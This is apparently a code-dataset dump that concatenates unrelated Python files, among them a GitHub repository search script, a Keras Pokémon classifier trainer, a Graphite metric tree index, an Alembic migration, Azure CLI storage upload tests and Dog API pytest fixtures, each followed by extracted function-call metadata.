(2802, 2825), False, 'import json\n'), ((2850, 2878), 'hashlib.sha256', 'hashlib.sha256', (['block_string'], {}), '(block_string)\n', (2864, 2878), False, 'import hashlib\n'), ((5088, 5146), 'PySimpleGUI.Text', 'sg.Text', (['"""Are you sure you want to send this Transaction?"""'], {}), "('Are you sure you want to send this Transaction?')\n", (5095, 5146), True, 'import PySimpleGUI as sg\n'), ((5428, 5463), 'PySimpleGUI.Text', 'sg.Text', (['fee'], {'justification': '"""right"""'}), "(fee, justification='right')\n", (5435, 5463), True, 'import PySimpleGUI as sg\n'), ((5530, 5574), 'PySimpleGUI.Text', 'sg.Text', (['total_amount'], {'justification': '"""right"""'}), "(total_amount, justification='right')\n", (5537, 5574), True, 'import PySimpleGUI as sg\n'), ((6664, 6696), 'json.dumps', 'json.dumps', (['data'], {'sort_keys': '(True)'}), '(data, sort_keys=True)\n', (6674, 6696), False, 'import json\n'), ((6785, 6815), 'Crypto.Signature.pkcs1_15.new', 'pkcs1_15.new', (['self.private_key'], {}), '(self.private_key)\n', (6797, 6815), False, 'from Crypto.Signature import pkcs1_15\n'), ((10444, 10473), 'PySimpleGUI.Text', 'sg.Text', (['"""Sent Transactions:"""'], {}), "('Sent Transactions:')\n", (10451, 10473), True, 'import PySimpleGUI as sg\n'), ((10489, 10528), 'PySimpleGUI.Multiline', 'sg.Multiline', (['sent_json'], {'size': '(100, 25)'}), '(sent_json, size=(100, 25))\n', (10501, 10528), True, 'import PySimpleGUI as sg\n'), ((10544, 10577), 'PySimpleGUI.Text', 'sg.Text', (['"""Received Transactions:"""'], {}), "('Received Transactions:')\n", (10551, 10577), True, 'import PySimpleGUI as sg\n'), ((10593, 10636), 'PySimpleGUI.Multiline', 'sg.Multiline', (['received_json'], {'size': '(100, 25)'}), '(received_json, size=(100, 25))\n', (10605, 10636), True, 'import PySimpleGUI as sg\n'), ((10653, 10670), 'PySimpleGUI.Button', 'sg.Button', (['"""Exit"""'], {}), "('Exit')\n", (10662, 10670), True, 'import PySimpleGUI as sg\n'), ((5163, 5205), 'PySimpleGUI.Text', 'sg.Text', (['"""Recipient"""'], {'justification': '"""left"""'}), "('Recipient', justification='left')\n", (5170, 5205), True, 'import PySimpleGUI as sg\n'), ((5207, 5248), 'PySimpleGUI.Text', 'sg.Text', (['recipient'], {'justification': '"""right"""'}), "(recipient, justification='right')\n", (5214, 5248), True, 'import PySimpleGUI as sg\n'), ((5266, 5315), 'PySimpleGUI.Text', 'sg.Text', (['"""Amount to send: """'], {'justification': '"""left"""'}), "('Amount to send: ', justification='left')\n", (5273, 5315), True, 'import PySimpleGUI as sg\n'), ((5319, 5357), 'PySimpleGUI.Text', 'sg.Text', (['amount'], {'justification': '"""right"""'}), "(amount, justification='right')\n", (5326, 5357), True, 'import PySimpleGUI as sg\n'), ((5375, 5425), 'PySimpleGUI.Text', 'sg.Text', (['"""Transaction Fee: """'], {'justification': '"""left"""'}), "('Transaction Fee: ', justification='left')\n", (5382, 5425), True, 'import PySimpleGUI as sg\n'), ((5480, 5527), 'PySimpleGUI.Text', 'sg.Text', (['"""Total Amount: """'], {'justification': '"""left"""'}), "('Total Amount: ', justification='left')\n", (5487, 5527), True, 'import PySimpleGUI as sg\n'), ((5591, 5611), 'PySimpleGUI.Button', 'sg.Button', (['"""Confirm"""'], {}), "('Confirm')\n", (5600, 5611), True, 'import PySimpleGUI as sg\n'), ((5615, 5632), 'PySimpleGUI.Button', 'sg.Button', (['"""Exit"""'], {}), "('Exit')\n", (5624, 5632), True, 'import PySimpleGUI as sg\n')] |
import requests
import json
import time
import os
import sys
green = "\x1b[38;2;0;255;0m"
greenish = "\x1b[38;2;93;173;110m"
red = "\x1b[38;2;255;0;0m"
grey = "\x1b[38;2;193;184;192m"
reset = "\033[0m"
clear_line = "\033[0K"
# Maximum repository size in megabytes
MAX_REPO_SIZE = 5
def load_cache():
result = []
seen = set()
for file in os.listdir("sources"):
if file.endswith(".json"):
text = open("sources/" + file).read()
for item in json.loads(text)["items"]:
size_in_mb = item["size"]/1000
if size_in_mb > MAX_REPO_SIZE:
continue
url = item["clone_url"]
if url not in seen:
seen.add(url)
result.append({
"url": item["clone_url"],
"score": item["stargazers_count"] + 0.5*item["watchers_count"] + 1,
})
return result
def create_cache():
print(green + "Searching github..." + reset)
if not os.path.exists("sources"):
os.mkdir("sources")
queries = ["utilities", "", "useful", "tools"]
for query_id, query in enumerate(queries):
page = 1
print("\r" + clear_line + "\n" + greenish +
"Searching using query '{}' (id: {})".format(query, query_id))
while page < 100:
path = "sources/query_{}_page_{}.json".format(query_id, page)
if os.path.exists(path):
print("\r" + clear_line + green +
"Skipping page {}, using data from cache...".format(page) + reset)
page += 1
continue
else:
print("\r" + clear_line + green +
"Searching page {}... ".format(page) + reset, end="")
r = requests.get(
"https://api.github.com/search/repositories?q={}+language:java&sort=stars&order=desc&page={}".format(query, page))
if not r.ok:
if "Only the first 1000 search results are available" in r.text:
print(
"limit reached: only the first 1000 search results are available")
break
print(red + "Query failed\n" + r.text + reset)
print("Sleeping for some time before retrying")
time.sleep(10)
continue
try:
data = json.loads(r.text)
except Exception as e:
print("Json parsing failed")
print(e)
print("Sleeping for some time before retrying", end="")
time.sleep(10)
continue
print(green + "done" + reset)
with open(path, "w") as f:
f.write(json.dumps(data))
page += 1
# Github rate limit of 10 requests per minute
print(grey + "Sleeping due to rate limit..." + reset, end="")
sys.stdout.flush()
time.sleep(60/10)
if __name__ == "__main__":
create_cache()
print(load_cache())
| [
"os.path.exists",
"json.loads",
"os.listdir",
"json.dumps",
"time.sleep",
"os.mkdir",
"sys.stdout.flush"
] | [((353, 374), 'os.listdir', 'os.listdir', (['"""sources"""'], {}), "('sources')\n", (363, 374), False, 'import os\n'), ((1048, 1073), 'os.path.exists', 'os.path.exists', (['"""sources"""'], {}), "('sources')\n", (1062, 1073), False, 'import os\n'), ((1083, 1102), 'os.mkdir', 'os.mkdir', (['"""sources"""'], {}), "('sources')\n", (1091, 1102), False, 'import os\n'), ((1463, 1483), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (1477, 1483), False, 'import os\n'), ((2997, 3015), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (3013, 3015), False, 'import sys\n'), ((3028, 3047), 'time.sleep', 'time.sleep', (['(60 / 10)'], {}), '(60 / 10)\n', (3038, 3047), False, 'import time\n'), ((485, 501), 'json.loads', 'json.loads', (['text'], {}), '(text)\n', (495, 501), False, 'import json\n'), ((2373, 2387), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (2383, 2387), False, 'import time\n'), ((2454, 2472), 'json.loads', 'json.loads', (['r.text'], {}), '(r.text)\n', (2464, 2472), False, 'import json\n'), ((2666, 2680), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (2676, 2680), False, 'import time\n'), ((2812, 2828), 'json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (2822, 2828), False, 'import json\n')] |
from model import make_model, IMAGE_SIZE
from tensorflow.keras.preprocessing.image import ImageDataGenerator
model = make_model()
batch_size = 16
# this is the augmentation configuration we will use for training
train_datagen = ImageDataGenerator(
rescale=1./255,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
# this is the augmentation configuration we will use for testing:
# only rescaling
test_datagen = ImageDataGenerator(rescale=1./255)
# this is a generator that will read pictures found in
# subfolers of 'data/train', and indefinitely generate
# batches of augmented image data
train_generator = train_datagen.flow_from_directory(
'PokemonData/', # this is the target directory
target_size=IMAGE_SIZE, # all images will be resized to 150x150
batch_size=batch_size,
class_mode='categorical') # since we use binary_crossentropy loss, we need binary labels
# this is a similar generator, for validation data
validation_generator = test_datagen.flow_from_directory(
'PokemonData/',
target_size=IMAGE_SIZE,
batch_size=batch_size,
class_mode='categorical')
model.fit_generator(
train_generator,
steps_per_epoch=2000 // batch_size,
epochs=50,
validation_data=validation_generator,
validation_steps=800 // batch_size)
# always save your weights after training or during training
model.save_weights('first_try.h5') | [
"tensorflow.keras.preprocessing.image.ImageDataGenerator",
"model.make_model"
] | [((118, 130), 'model.make_model', 'make_model', ([], {}), '()\n', (128, 130), False, 'from model import make_model, IMAGE_SIZE\n'), ((231, 327), 'tensorflow.keras.preprocessing.image.ImageDataGenerator', 'ImageDataGenerator', ([], {'rescale': '(1.0 / 255)', 'shear_range': '(0.2)', 'zoom_range': '(0.2)', 'horizontal_flip': '(True)'}), '(rescale=1.0 / 255, shear_range=0.2, zoom_range=0.2,\n horizontal_flip=True)\n', (249, 327), False, 'from tensorflow.keras.preprocessing.image import ImageDataGenerator\n'), ((437, 474), 'tensorflow.keras.preprocessing.image.ImageDataGenerator', 'ImageDataGenerator', ([], {'rescale': '(1.0 / 255)'}), '(rescale=1.0 / 255)\n', (455, 474), False, 'from tensorflow.keras.preprocessing.image import ImageDataGenerator\n')] |
"""Написать функцию которая возвращают случайным образом одну карту из стандартной колоды в 36 карт,
где на первом месте номинал карты номинал (6 - 10, J, D, K, A),
а на втором название масти (Hearts, Diamonds, Clubs, Spades)."""
import random
"""faces = ["6", "7", "8", "9", "10", "J", "D", "K", "A"]
suits = ["Hearts", "Diamonds", "Clubs", "Spades"]
a = random.choice(faces)
b = random.choice(suits)
print(a)
print(b)
"""
def carddraw():
faces = ["6", "7", "8", "9", "10", "J", "D", "K", "A"]
suits = ["Hearts", "Diamonds", "Clubs", "Spades"]
cards = []
for suit in suits:
for face in faces:
cards.append([face, suit])
card = random.choice(cards)
return card
if __name__ == "__main__":
print(carddraw()) | [
"random.choice"
] | [((674, 694), 'random.choice', 'random.choice', (['cards'], {}), '(cards)\n', (687, 694), False, 'import random\n')] |
# -*- coding: UTF-8 -*-
from unittest import TestCase
class TestNumpy(TestCase):
def test_dot(self):
from numpy import array, dot
A = array([[1,2],[3,4]], dtype='int32')
B = array([[5,6],[7,8]], dtype='int32')
R = array([[19,22],[43,50]], dtype='int32')
for val in (dot(A,B)-R).flat:
self.assertEqual(val, 0)
u = array([1,1], dtype='int32')
Ru = array([3,7], dtype='int32')
for val in (dot(A,u)-Ru).flat:
self.assertEqual(val, 0)
def test_eig(self):
from numpy import array, dot
from numpy.linalg import eig, inv
A = array([[1,2],[3,4]], dtype='int32')
vals, mat = eig(A)
lbd = dot(dot(inv(mat), A), mat)
for i in range(2):
self.assertAlmostEqual(vals[i], lbd[i,i], places=14)
| [
"numpy.array",
"numpy.dot",
"numpy.linalg.inv",
"numpy.linalg.eig"
] | [((157, 195), 'numpy.array', 'array', (['[[1, 2], [3, 4]]'], {'dtype': '"""int32"""'}), "([[1, 2], [3, 4]], dtype='int32')\n", (162, 195), False, 'from numpy import array, dot\n'), ((205, 243), 'numpy.array', 'array', (['[[5, 6], [7, 8]]'], {'dtype': '"""int32"""'}), "([[5, 6], [7, 8]], dtype='int32')\n", (210, 243), False, 'from numpy import array, dot\n'), ((253, 295), 'numpy.array', 'array', (['[[19, 22], [43, 50]]'], {'dtype': '"""int32"""'}), "([[19, 22], [43, 50]], dtype='int32')\n", (258, 295), False, 'from numpy import array, dot\n'), ((380, 408), 'numpy.array', 'array', (['[1, 1]'], {'dtype': '"""int32"""'}), "([1, 1], dtype='int32')\n", (385, 408), False, 'from numpy import array, dot\n'), ((421, 449), 'numpy.array', 'array', (['[3, 7]'], {'dtype': '"""int32"""'}), "([3, 7], dtype='int32')\n", (426, 449), False, 'from numpy import array, dot\n'), ((641, 679), 'numpy.array', 'array', (['[[1, 2], [3, 4]]'], {'dtype': '"""int32"""'}), "([[1, 2], [3, 4]], dtype='int32')\n", (646, 679), False, 'from numpy import array, dot\n'), ((697, 703), 'numpy.linalg.eig', 'eig', (['A'], {}), '(A)\n', (700, 703), False, 'from numpy.linalg import eig, inv\n'), ((313, 322), 'numpy.dot', 'dot', (['A', 'B'], {}), '(A, B)\n', (316, 322), False, 'from numpy import array, dot\n'), ((469, 478), 'numpy.dot', 'dot', (['A', 'u'], {}), '(A, u)\n', (472, 478), False, 'from numpy import array, dot\n'), ((726, 734), 'numpy.linalg.inv', 'inv', (['mat'], {}), '(mat)\n', (729, 734), False, 'from numpy.linalg import eig, inv\n')] |
# Copyright (C) [2015-2017] [Thomson Reuters LLC]
# Copyright (C) [2015-2017] [<NAME>]
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tree representation of Graphite metrics"""
from __future__ import absolute_import, print_function
import json
from collections import deque
from graphite_api.utils import is_pattern
from graphite_api.finders import match_entries
def _encode_bytes(_str):
if not isinstance(b'', str):
return _str.encode('utf-8')
return bytes(_str)
def _decode_str(_str):
try:
return _str.decode('utf-8')
except AttributeError:
pass
return _str
class Node(object):
"""Node class of a graphite metric"""
__slots__ = ('children')
def __init__(self):
self.children = None
def is_leaf(self):
"""Returns True/False depending on whether self is a LeafNode or not"""
return self.children is None
def insert(self, paths):
"""Insert path in this node's children"""
if len(paths) == 0:
return
if self.children is None:
self.children = ()
child_name = paths.popleft()
for (_child_name, node) in self.children:
# Fast path for end of recursion - avoids extra recursion
# for empty paths list
if len(paths) == 0 and child_name == _child_name:
return
elif child_name == _child_name:
return node.insert(paths)
node = Node()
self.children += ((child_name, node),)
return node.insert(paths)
def to_array(self):
"""Return list of (name, children) items for this node's children"""
return [(_decode_str(name), node.to_array(),)
for (name, node,) in self.children] \
if self.children is not None else None
@staticmethod
def from_array(array):
"""Load given parent node's children from array"""
metric = Node()
if array is None:
return metric
else:
metric.children = ()
for child_name, child_array in array:
child = Node.from_array(child_array)
metric.children += ((_encode_bytes(child_name), child),)
return metric
class NodeTreeIndex(object):
"""Node tree index class with graphite glob searches per sub-part of a
query
"""
__slots__ = ('index')
@property
def children(self):
return self.index.children if self.index.children else []
def __init__(self):
self.index = Node()
def insert(self, metric_path):
"""Insert metric path into tree index"""
paths = deque([_encode_bytes(s) for s in metric_path.split('.')])
self.index.insert(paths)
def insert_split_path(self, paths):
"""Insert already split path into tree index"""
self.index.insert(deque([_encode_bytes(s) for s in paths]))
def clear(self):
"""Clear tree index"""
self.index.children = None
def query(self, query):
"""Return nodes matching Graphite glob pattern query"""
nodes = sorted(self.search(self.index, query.split('.'), []))
return (('.'.join(path), node,)
for path, node in nodes)
def _get_children_from_matched_paths(self, matched_paths, node):
for (path, _node) in node.children:
_path = _decode_str(path)
if _path in matched_paths:
yield (_path, _node)
def _get_child_from_string_query(self, sub_query, node):
for (path, _node) in node.children:
if _decode_str(path) == sub_query:
return _node
def _get_matched_children(self, sub_query, node):
keys = [_decode_str(key) for (key, _) in node.children] \
if node.children is not None else []
matched_paths = match_entries(keys, sub_query)
if node.children is not None and is_pattern(sub_query):
matched_children = self._get_children_from_matched_paths(
matched_paths, node)
else:
matched_children = [(sub_query,
self._get_child_from_string_query(
sub_query, node))] \
if node.children is not None \
and sub_query in keys else []
return matched_children
def search(self, node, split_query, split_path):
"""Return matching children for each query part in split query starting
from given node"""
sub_query = split_query[0]
matched_children = self._get_matched_children(sub_query, node)
for child_name, child_node in matched_children:
child_path = split_path[:]
child_path.append(child_name)
child_query = split_query[1:]
if len(child_query) > 0:
for sub in self.search(child_node, child_query, child_path):
yield sub
else:
yield (child_path, child_node)
def to_array(self):
"""Return array representation of tree index"""
return self.index.to_array()
@staticmethod
def from_array(model):
"""Load tree index from array"""
metric_index = NodeTreeIndex()
metric_index.index = Node.from_array(model)
return metric_index
@staticmethod
def from_file(file_h):
"""Load tree index from file handle"""
index = NodeTreeIndex.from_array(json.load(file_h))
return index
| [
"json.load",
"graphite_api.finders.match_entries",
"graphite_api.utils.is_pattern"
] | [((4330, 4360), 'graphite_api.finders.match_entries', 'match_entries', (['keys', 'sub_query'], {}), '(keys, sub_query)\n', (4343, 4360), False, 'from graphite_api.finders import match_entries\n'), ((4402, 4423), 'graphite_api.utils.is_pattern', 'is_pattern', (['sub_query'], {}), '(sub_query)\n', (4412, 4423), False, 'from graphite_api.utils import is_pattern\n'), ((5996, 6013), 'json.load', 'json.load', (['file_h'], {}), '(file_h)\n', (6005, 6013), False, 'import json\n')] |
"""create pipeline_retries table
Revision ID: d04cf726555d
Revises: <PASSWORD>
Create Date: 2021-09-02 13:04:36.053768
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'd04cf726555d'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
'pipeline_retries',
sa.Column('pipeline_id', sa.String, primary_key=True),
sa.Column('number_of_error_statuses', sa.Integer, nullable=False)
)
op.create_foreign_key('fk_pipeline_retries_pipeline', 'pipeline_retries', 'pipelines', ['pipeline_id'], ['name'])
def downgrade():
op.drop_table('pipeline_retries')
| [
"alembic.op.drop_table",
"sqlalchemy.Column",
"alembic.op.create_foreign_key"
] | [((522, 639), 'alembic.op.create_foreign_key', 'op.create_foreign_key', (['"""fk_pipeline_retries_pipeline"""', '"""pipeline_retries"""', '"""pipelines"""', "['pipeline_id']", "['name']"], {}), "('fk_pipeline_retries_pipeline', 'pipeline_retries',\n 'pipelines', ['pipeline_id'], ['name'])\n", (543, 639), False, 'from alembic import op\n'), ((659, 692), 'alembic.op.drop_table', 'op.drop_table', (['"""pipeline_retries"""'], {}), "('pipeline_retries')\n", (672, 692), False, 'from alembic import op\n'), ((383, 436), 'sqlalchemy.Column', 'sa.Column', (['"""pipeline_id"""', 'sa.String'], {'primary_key': '(True)'}), "('pipeline_id', sa.String, primary_key=True)\n", (392, 436), True, 'import sqlalchemy as sa\n'), ((446, 511), 'sqlalchemy.Column', 'sa.Column', (['"""number_of_error_statuses"""', 'sa.Integer'], {'nullable': '(False)'}), "('number_of_error_statuses', sa.Integer, nullable=False)\n", (455, 511), True, 'import sqlalchemy as sa\n')] |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import os
from azure.cli.testsdk import (ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest)
from ..storage_test_util import StorageScenarioMixin
class StorageFileShareScenarios(StorageScenarioMixin, ScenarioTest):
@ResourceGroupPreparer()
@StorageAccountPreparer()
def test_storage_file_upload_small_file_v2(self, resource_group, storage_account_info):
account_info = storage_account_info
share_name = self.create_share(account_info)
curr_dir = os.path.dirname(os.path.realpath(__file__))
local_file = os.path.join(curr_dir, 'upload_file').replace('\\', '\\\\')
local_file_name = 'upload_file'
self.storage_cmd('storage file upload -s {} --source "{}" '
'--content-cache-control no-cache '
'--content-disposition attachment '
'--content-encoding compress '
'--content-language en-US '
'--content-type "multipart/form-data;" '
'--metadata key=val ', account_info, share_name, local_file)
self.storage_cmd('storage file show -s {} -p "{}"', account_info, share_name, local_file_name) \
.assert_with_checks(JMESPathCheck('name', local_file_name),
JMESPathCheck('properties.contentSettings.cacheControl', 'no-cache'),
JMESPathCheck('properties.contentSettings.contentDisposition', 'attachment'),
JMESPathCheck('properties.contentSettings.contentEncoding', 'compress'),
JMESPathCheck('properties.contentSettings.contentLanguage', 'en-US'),
JMESPathCheck('properties.contentSettings.contentType', 'multipart/form-data;'),
JMESPathCheck('metadata', {'key': 'val'}))
dest_dir = 'dest_dir'
from azure.core.exceptions import ResourceNotFoundError
with self.assertRaises(ResourceNotFoundError):
self.storage_cmd('storage file upload -s {} --source "{}" -p {}',
account_info, share_name, local_file, dest_dir)
self.storage_cmd('storage directory create -s {} -n {}', account_info, share_name, dest_dir)
self.storage_cmd('storage file upload -s {} --source "{}" -p {}',
account_info, share_name, local_file, dest_dir)
self.storage_cmd('storage file show -s {} -p "{}"', account_info, share_name, dest_dir + '/' + local_file_name) \
.assert_with_checks(JMESPathCheck('name', local_file_name))
dest_file = 'dest_file.json'
self.storage_cmd('storage file upload -s {} --source "{}" -p {}',
account_info, share_name, local_file, dest_file)
self.storage_cmd('storage file show -s {} -p "{}"', account_info, share_name, dest_file) \
.assert_with_checks(JMESPathCheck('name', dest_file))
dest_path = dest_dir + '/' + dest_file
self.storage_cmd('storage file upload -s {} --source "{}" -p {}',
account_info, share_name, local_file, dest_path)
self.storage_cmd('storage file show -s {} -p "{}"', account_info, share_name, dest_path) \
.assert_with_checks(JMESPathCheck('name', dest_file))
sub_deep_path = dest_dir + '/' + 'sub_dir'
self.storage_cmd('storage directory create -s {} -n {}', account_info, share_name, sub_deep_path)
self.storage_cmd('storage file upload -s {} --source "{}" -p {}',
account_info, share_name, local_file, sub_deep_path)
self.storage_cmd('storage file show -s {} -p "{}"', account_info, share_name,
sub_deep_path + '/' + local_file_name). \
assert_with_checks(JMESPathCheck('name', local_file_name))
sub_deep_file = sub_deep_path + '/' + dest_file
self.storage_cmd('storage file upload -s {} --source "{}" -p {}',
account_info, share_name, local_file, sub_deep_file)
self.storage_cmd('storage file show -s {} -p "{}"', account_info, share_name,
sub_deep_file).assert_with_checks(JMESPathCheck('name', dest_file))
| [
"azure.cli.testsdk.StorageAccountPreparer",
"os.path.join",
"os.path.realpath",
"azure.cli.testsdk.JMESPathCheck",
"azure.cli.testsdk.ResourceGroupPreparer"
] | [((595, 618), 'azure.cli.testsdk.ResourceGroupPreparer', 'ResourceGroupPreparer', ([], {}), '()\n', (616, 618), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((624, 648), 'azure.cli.testsdk.StorageAccountPreparer', 'StorageAccountPreparer', ([], {}), '()\n', (646, 648), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((874, 900), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (890, 900), False, 'import os\n'), ((1613, 1651), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""name"""', 'local_file_name'], {}), "('name', local_file_name)\n", (1626, 1651), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((1685, 1753), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""properties.contentSettings.cacheControl"""', '"""no-cache"""'], {}), "('properties.contentSettings.cacheControl', 'no-cache')\n", (1698, 1753), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((1787, 1863), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""properties.contentSettings.contentDisposition"""', '"""attachment"""'], {}), "('properties.contentSettings.contentDisposition', 'attachment')\n", (1800, 1863), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((1897, 1968), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""properties.contentSettings.contentEncoding"""', '"""compress"""'], {}), "('properties.contentSettings.contentEncoding', 'compress')\n", (1910, 1968), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((2002, 2070), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""properties.contentSettings.contentLanguage"""', '"""en-US"""'], {}), "('properties.contentSettings.contentLanguage', 'en-US')\n", (2015, 2070), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((2104, 2183), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""properties.contentSettings.contentType"""', '"""multipart/form-data;"""'], {}), "('properties.contentSettings.contentType', 'multipart/form-data;')\n", (2117, 2183), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((2217, 2258), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""metadata"""', "{'key': 'val'}"], {}), "('metadata', {'key': 'val'})\n", (2230, 2258), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((2971, 3009), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""name"""', 'local_file_name'], {}), "('name', local_file_name)\n", (2984, 3009), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((3330, 3362), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""name"""', 'dest_file'], {}), "('name', dest_file)\n", (3343, 3362), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((3693, 3725), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""name"""', 'dest_file'], {}), "('name', dest_file)\n", (3706, 3725), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((4224, 4262), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""name"""', 'local_file_name'], {}), "('name', local_file_name)\n", (4237, 4262), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((4620, 4652), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""name"""', 'dest_file'], {}), "('name', dest_file)\n", (4633, 4652), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((923, 960), 'os.path.join', 'os.path.join', (['curr_dir', '"""upload_file"""'], {}), "(curr_dir, 'upload_file')\n", (935, 960), False, 'import os\n')] |
"""Fixtures for tests.py (Dogs API testing)"""
import pytest
import requests
URLS = ["https://dog.ceo/dog-api/",
"https://dog.ceo/api/breeds/list/all",
"https://dog.ceo/api/breeds/image/random",
"https://dog.ceo/api/breeds/image/random/3",
"https://dog.ceo/api/breed/hound/images",
"https://dog.ceo/api/breed/hound/images/random",
"https://dog.ceo/api/breed/hound/images/random/3",
"https://dog.ceo/api/breed/hound/list",
"https://dog.ceo/api/breed/hound/afghan/images",
"https://dog.ceo/api/breed/hound/afghan/images/random",
"https://dog.ceo/api/breed/hound/afghan/images/random/3", ]
"""List general ULRS with Dogs API"""
HEADERS = [{"Content-type": "application/json"}, {"Content-type": "text/html"}, {}]
PAIRS = [(url, header) for url in URLS for header in HEADERS]
@pytest.fixture(params=PAIRS)
def pairs_of_response(request):
"""pairwise testing for content-type, headers in responses for all urls """
response = requests.get(request.param[0], headers=request.param[1])
print(request.param[0])
print(request.param[1])
return response
@pytest.fixture()
def listallbreeds():
"""GET Request to https://dog.ceo/api/breeds/list/all and return Json data"""
response = requests.get(URLS[1])
json_data = response.json()
return json_data
@pytest.fixture()
def randomimage():
"""GET Request to "https://dog.ceo/api/breeds/image/random/3"
and return Json data with random image"""
class Randomimage():
""""I don't know why it here, I am google it"""
@staticmethod
def get_random_image():
"""Function for class"""
response = requests.get(URLS[2])
json_data = response.json()
return json_data
return Randomimage()
@pytest.fixture()
def randomthreeimage():
"""GET Request to "https://dog.ceo/api/breeds/image/random"
and return Json data with three random image"""
class Randomimage():
""""I don't know why it here, I am google it"""
@staticmethod
def get_random_three_image():
"""Function for class"""
response = requests.get(URLS[3])
json_data = response.json()
return json_data
return Randomimage()
@pytest.fixture()
def list_of_breed():
"""GET Request to "https://dog.ceo/api/breed/hound/images"
and return Json data with list а all images by breed
"hound" """
response = requests.get(URLS[4])
json_data = response.json()
return json_data
@pytest.fixture()
def get_random_image_by_breed():
"""GET Request to "https://dog.ceo/api/breed/hound/images/random"
and return Json data with random image by breed"""
class Randomimage():
""""I don't know why it here, I am google it"""
@staticmethod
def get_random_image():
"""Function for class"""
response = requests.get(URLS[5])
json_data = response.json()
return json_data
return Randomimage()
@pytest.fixture()
def get_random_three_image_by_breed():
"""GET Request to "https://dog.ceo/api/breed/hound/images/random/3"
and return Json data with random three image
by breed """
class Randomimage():
""""I don't know why it here, I am google it"""
@staticmethod
def get_random_three_image():
"""Function for class"""
response = requests.get(URLS[6])
json_data = response.json()
return json_data
return Randomimage()
@pytest.fixture()
def listallsubbreeds():
"""GET Request to "https://dog.ceo/api/breed/hound/images"
and return Json data with list а all images by sub-breeds
for "hound" """
response = requests.get(URLS[7])
json_data = response.json()
return json_data
@pytest.fixture()
def list_of_subbreed():
"""GET Request to "https://dog.ceo/api/breed/hound/afghan/images"
and return Json data with list а all images by
sub-breed "afghan" """
response = requests.get(URLS[8])
json_data = response.json()
return json_data
@pytest.fixture()
def get_random_image_by_subbreed():
"""GET Request to "https://dog.ceo/api/breed/hound/afghan/images/random"
and return Json data with random image
by sub-breed "afghan" """
class Randomimage():
""""I don't know why it here, I am google it"""
@staticmethod
def get_random_image():
"""Function for class"""
response = requests.get(URLS[9])
json_data = response.json()
return json_data
return Randomimage()
@pytest.fixture()
def get_random_three_image_by_subbreed():
"""GET Request to "https://dog.ceo/api/breed/hound/afghan/images/random/3"
and return Json data with three random
image by sub-breed "afghan" """
class Randomimage():
""""I don't know why it here, I am google it"""
@staticmethod
def get_random_three_image():
"""Function for class"""
response = requests.get(URLS[10])
json_data = response.json()
return json_data
return Randomimage()
| [
"pytest.fixture",
"requests.get"
